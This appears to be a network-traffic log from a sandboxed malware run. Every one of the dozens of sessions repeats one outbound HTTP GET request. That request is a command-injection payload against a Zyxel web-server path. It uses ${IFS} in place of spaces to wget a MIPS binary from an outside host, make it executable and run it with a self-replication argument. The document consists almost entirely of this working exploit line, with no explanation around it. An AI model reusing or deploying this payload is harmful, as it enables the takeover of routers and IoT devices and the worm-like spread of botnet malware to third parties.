                                            Jan 14, 2024 15:50:35.328810930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3009192.168.2.234177495.187.197.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328839064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3010192.168.2.233333613.4.152.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328852892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3011192.168.2.235301414.102.11.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328862906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3012192.168.2.2352874186.89.196.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328938007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3013192.168.2.233550471.88.131.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328988075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3014192.168.2.235755651.215.139.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329005957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3015192.168.2.234194019.47.170.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329024076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3016192.168.2.235995285.194.88.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329050064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3017192.168.2.2337692114.249.190.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329099894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3018192.168.2.233574065.94.45.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329121113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3019192.168.2.2357876154.83.178.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329171896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3020192.168.2.233836046.197.65.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329204082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3021192.168.2.2342708155.134.132.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329236984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3022192.168.2.2352404151.60.176.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329265118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3023192.168.2.2343632200.251.12.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329296112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3024192.168.2.235802259.19.123.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329346895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3025192.168.2.2355686217.111.62.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329380989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3026192.168.2.2348684206.82.249.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329406023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3027192.168.2.234283834.18.141.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329432011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3028192.168.2.233716813.152.166.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329456091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3029192.168.2.234675697.171.251.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329483986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3030192.168.2.2338644102.106.8.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329514027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3031192.168.2.2339972142.98.177.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329545975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3032192.168.2.235833470.129.129.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329583883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3033192.168.2.2358690113.35.234.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329629898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3034192.168.2.2344788159.169.157.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329655886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3035192.168.2.2359376189.81.246.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329684019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3036192.168.2.2336250101.247.93.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329725027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3037192.168.2.233997895.201.28.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329749107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3038192.168.2.2334880148.226.243.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329773903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3039192.168.2.2342776173.113.237.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329787970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3040192.168.2.2334238173.197.23.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329838991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3041192.168.2.2342598167.89.1.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329859018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3042192.168.2.2357272170.215.5.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329899073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3043192.168.2.2333142176.5.112.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329932928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3044192.168.2.2349918160.238.98.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329967022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3045192.168.2.235150890.218.119.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.329992056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3046192.168.2.234072474.54.131.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330041885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3047192.168.2.235064689.186.190.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330077887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3048192.168.2.234370431.255.187.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330112934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3049192.168.2.234029670.229.214.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330143929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3050192.168.2.234593432.225.69.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330178022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3051192.168.2.235488437.74.229.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330219984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3052192.168.2.235998457.62.131.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330245972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3053192.168.2.233471024.80.70.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330271006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3054192.168.2.2359436146.251.82.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330297947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3055192.168.2.2359912113.164.151.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330338001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3056192.168.2.233816063.70.121.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330374002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3057192.168.2.2358254218.126.60.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330424070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3058192.168.2.235942293.54.220.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330445051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3059192.168.2.2347490207.15.53.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330466032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3060192.168.2.2340524149.249.36.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330498934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3061192.168.2.235104054.190.220.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330542088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3062192.168.2.2350418114.243.252.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330588102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3063192.168.2.2351190118.146.196.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330600977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3064192.168.2.234904899.78.193.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330635071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3065192.168.2.2355766140.68.226.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330661058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3066192.168.2.2344586102.4.160.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330682039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3067192.168.2.234127076.242.18.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330709934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3068192.168.2.2352004185.106.62.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330758095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3069192.168.2.23459969.31.223.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330776930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3070192.168.2.2357708195.2.146.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330806971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3071192.168.2.235453465.240.208.174443
                                            TimestampBytes transferredDirectionData
